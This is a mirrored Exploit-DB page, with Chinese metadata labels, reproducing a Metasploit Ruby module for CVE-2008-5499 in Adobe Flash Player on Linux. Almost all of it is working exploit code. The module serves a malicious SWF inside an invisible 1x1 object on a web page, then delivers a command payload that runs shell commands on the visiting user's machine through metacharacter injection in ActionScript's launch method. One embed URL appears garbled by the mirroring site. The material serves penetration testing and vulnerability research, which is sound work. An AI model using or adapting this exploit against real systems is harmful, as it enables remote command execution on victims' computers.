Adobe Flash Player – ActionScript Launch Command Execution (Metasploit)

  • 作者: Metasploit
    日期: 2012-04-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18761/
  • ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##
    
    require 'msf/core'
    
    class Metasploit3 < Msf::Exploit::Remote
    	Rank = GoodRanking
    
    	include Msf::Exploit::Remote::HttpServer::HTML
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
    			'Description'=> %q{
    					This module exploits a vulnerability in Adobe Flash Player for Linux,
    					version10.0.12.36 and 9.0.151.0 and prior.
    					An input validation vulnerability allows command execution when the browser
    					loads a SWF file which contains shell metacharacters in the arguments to
    					the ActionScript launch method.
    
    					The victim must have Adobe AIR installed for the exploit to work. This module
    					was tested against version 10.0.12.36 (10r12_36).
    				},
    			'License'=> MSF_LICENSE,
    			'Author' =>
    				[
    					'0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
    				],
    			'References' =>
    				[
    					['CVE', '2008-5499'],
    					['OSVDB', '50796'],
    					['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
    					['URL', 'https://www.securityfocus.com/bid/32896/exploit']
    				],
    			'DefaultOptions' =>
    				{
    					'HTTP::compression' => 'gzip',
    					'HTTP::chunked' => true
    				},
    			'Platform' => 'unix', # so unix cmd exec payloads are ok
    			'Arch' => ARCH_CMD,
    			'Targets'=>
    				[
    					[ 'Automatic', {}],
    				],
    			'DisclosureDate' => 'Dec 17 2008',
    			'DefaultTarget'=> 0))
    
    	end
    
    	def exploit
    		path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
    		fd = File.open( path, "rb" )
    		@swf = fd.read(fd.stat.size)
    		fd.close
    
    		super
    	end
    
    	def on_request_uri(cli, request)
    		msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
    		trigger = @swf
    		trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
    
    		obj_id = rand_text_alpha(rand(6)+3)
    
    		if request.uri.match(/\.swf/i)
    			print_status("#{msg} Sending Exploit SWF")
    			send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
    			return
    		end
    
    		if request.uri.match(/\.txt/i)
    			send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
    			return
    		end
    
    		html =<<-EOS
    		<html>
    			<head>
    			</head>
    			<body>
    			<center>
    			<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
    				<param name="movie" value="#{get_resource}#{trigger_file}" />
    				<embed src="https://www.exploit-db.com/exploits/18761/#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all"
    					type="application/x-shockwave-flash"
    					pluginspage="http://www.macromedia.com/go/getflashplayer">
    				</embed>
    
    			</object>
    		</center>
    
    		</body>
    		</html>
    		EOS
    
    		print_status("#{msg} Sending HTML...")
    		send_response(cli, html, { 'Content-Type' => 'text/html' })
    	end
    end